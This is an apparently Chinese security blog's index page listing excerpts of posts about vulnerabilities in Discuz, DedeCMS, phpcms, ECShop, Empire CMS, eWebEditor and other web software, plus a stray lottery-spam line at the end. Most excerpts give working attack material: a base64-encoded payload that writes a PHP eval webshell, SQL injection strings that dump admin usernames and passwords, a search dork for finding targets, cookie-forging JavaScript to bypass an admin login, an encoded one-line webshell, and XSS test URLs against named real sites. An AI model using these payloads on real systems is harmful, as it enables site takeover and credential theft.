河北網絡安全博客

河北博客是一個關注網絡安全、網站設計、網站推廣、網站優化SEO、網站建設的河北地方博客。


[置頂] 關于河北博客【想了解河北博客的朋友請看這里】

[置頂] 站長朋友請看這里【永久置頂】

DZ!2.5 后臺拿 WebShell 方法 DZ!2.5 后臺拿 shell(圖)

buger

        1.注冊任意賬戶2.登陸用戶,發表blog日志(注意是日志)3.添加圖片,選擇網絡圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}  具體方法查看日志

河北博客:微軟爆出一安全漏洞 9億IE瀏覽器用戶或受影響

buger

        微軟公司目前還不能從根本上解決這個問題,不過已經發布了一個“自動修復”安全補丁,用于封堵各種惡意攻擊。該公司28日還強調,該漏洞僅僅是一個嚴重威脅,還沒有發現黑客利用它進行攻擊的現象。

河北博客:某酒業網會員注冊上傳漏洞及修復

buger

發布日期:2011-01.29
漏洞類型:文件上傳
文件:sub_upload.asp

河北博客:dircms XSS漏洞和利用方法及修復

buger

XSS漏洞文件:在線投稿功能

河北博客:最新DEDECMS 漏洞0day 影響版本(dede5.5、dede5.6)

buger

影響版本:dedecms5.5-5.6
官方網站:http://www.dedecms.com
漏洞類型:設計錯誤
漏洞代碼:member\index_do.php

WEB站點安全評估 防范網頁掛馬攻擊

buger

        對于一些大型網站來說,通常擁有一整套已經執行了的WEB站點安全防范解決方案,但是,為什么一些網站還是會被攻擊者掛載木馬?其中一個最主要的原因是已經實施的WEB站點安全解決方案只能夠應對已經出現的安全漏洞和威脅。

z-blog 1.8 最新跨站XSS漏洞及修復方法

buger

漏洞文件:cmd.asp

新網被指存漏洞導致域名被盜 用戶稱考慮索賠

buger

11月17日消息,今日有域名界人士向TechWeb反映,眾多在新網注冊的CN域名被盜,包括51.cn、61.cn、168.cn、188.cn等極具價值的域名。域名界人士認為,被盜原因很可能是新網系統存在重大漏洞。

phpcms2008 sp3注入漏洞

buger

phpcms最新版注入漏洞 注入yp/company.php?where=%23
進入后臺訪問
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

ECShop 2.7.2 最新任意用戶登陸漏洞0day

buger

     ECShop 2.7.2正式版的源代碼, 且低級漏洞。這個漏洞可以讓任何人以任何用戶身份登錄到ECShop前臺! 漏洞的影響 ECShop 2.7.2,ECShop 2.7.1 不受影響 漏洞的出現 漏洞出現在/include/init.php文件的512行左右, 代碼如下

phpcms2008 yp.php 注入利用 Xday EXP

buger

測試方法: 保存以下代碼為phpcms2008.php。安裝php,進入php目錄。執行php php2008.php localhost /yq 本地測試成功。

瑞星防火墻監測出華軍軟件園被掛馬(附圖)

buger

      被掛馬頁面1:http://www.onlinedown.net/soft/3011.htm  被掛馬頁面2:http://www.onlinedown.net/softdown/3011_2.htm  不知道這次是華軍真的被掛馬呢還是誤報

游九(U9)網DOTA專題站搜索頁跨站漏洞

buger

代碼如下,括號任意內容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.nfwwds.tw")</script>

UCHOME1.5 XSS漏洞

buger

測試代碼: 需要先登入會員
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

MSN Editor 漏洞

buger

這個編輯器相當的簡陋,下午拿站的時候碰到了一個,沒有數據庫備份,也沒有什么可以直接上傳webshell的地方,簡陋到只有一個editor的界面。簡單說下利用的方法吧。

新云4.0最新0day

buger

訪問ask目錄,注冊用戶,
在密碼問題的地方插入加密后的一句話:┼攠數畣整爠煥敵瑳∨≡┩愾
注冊成功后連接默認數據庫:ask/data/ask_newasp.asa 密碼:a

ewebeditor后臺通殺漏洞

buger

今天看了下ewebeditor php的版本,記得以前看了php版,那個版本比較低,連后臺都沒
今天下了個3.8的,竟然找出一點令人興奮的東西出來…
php版本后臺是調用../ewebeditor/admin/config.php,大家去看下源碼就知道
利用方法:首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
...

帝國CMS系統注入漏洞

buger

GG關鍵字:inurl:e/tool/gbook/?bid=1
主要填寫您的姓名和聯系郵箱這兩處,其它的隨便填。
您的姓名:縗\
聯系郵箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后進行提交返回頁面即爆出用戶名密碼。

Z-BLOG XSS Vulnerabilities漏洞

buger

漏洞描述:
Z-BLOG后臺登陸錯誤信息顯示文件c_error.asp,雖然對跳轉URL的參數sourceurl進行了編碼,但沒有判斷鏈接頭部,執行了javascript偽協議,造成跨站腳本漏洞。
漏洞測試:

http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
...

PHP萬能密碼

buger

神秘小強&1943
說實話如果一個網站的前臺都是注入漏洞,那么憑經驗,萬能密碼進后臺的幾率基本上是

百分之百。

     可是有的人說對PHP的站如果是GPC魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了

PHP注入。

     其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進PHP的后臺。

     其實GPC魔術轉換是否開啟對用萬能密碼進后臺一點影響也沒有。

...

php+mysql如何爆頁面絕對路徑

buger

1、加引號’這個最常用 


2、變參數類型,比如把id=1改為id=a等 有時很有效果 


3、亂添數據,比如把id=1改為id=1111111111111111111111......等 有時很有效果 


4、text.php?aa[]=xx 


5、利用php的max_execution_time, 能將絕對路徑顯示出來. 這機率非常小.適合在服務器負荷嚴重的時候測試. 

...
分頁:1[2][3]

訂閱河北博客

  • 訂閱我的博客:訂閱我的博客
  • 關注新浪微博:關注新浪微博
  • 關注騰訊微博:關注騰訊微博
  • google reader
  • 鮮果
  • 抓蝦
  • QQ邮箱

河北博客站內搜索

河北博客相關鏈接

河北博客熱文排行

Powered By kingwq's blog

本站采用創作共用版權協議, 要求署名、非商業用途和保持一致. 轉載本站內容必須也遵循“署名-非商業用途-保持一致”的創作共用協議.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP備09002514號.Copyright www.nfwwds.tw.2010

云南快乐十分走势图基本走势图百度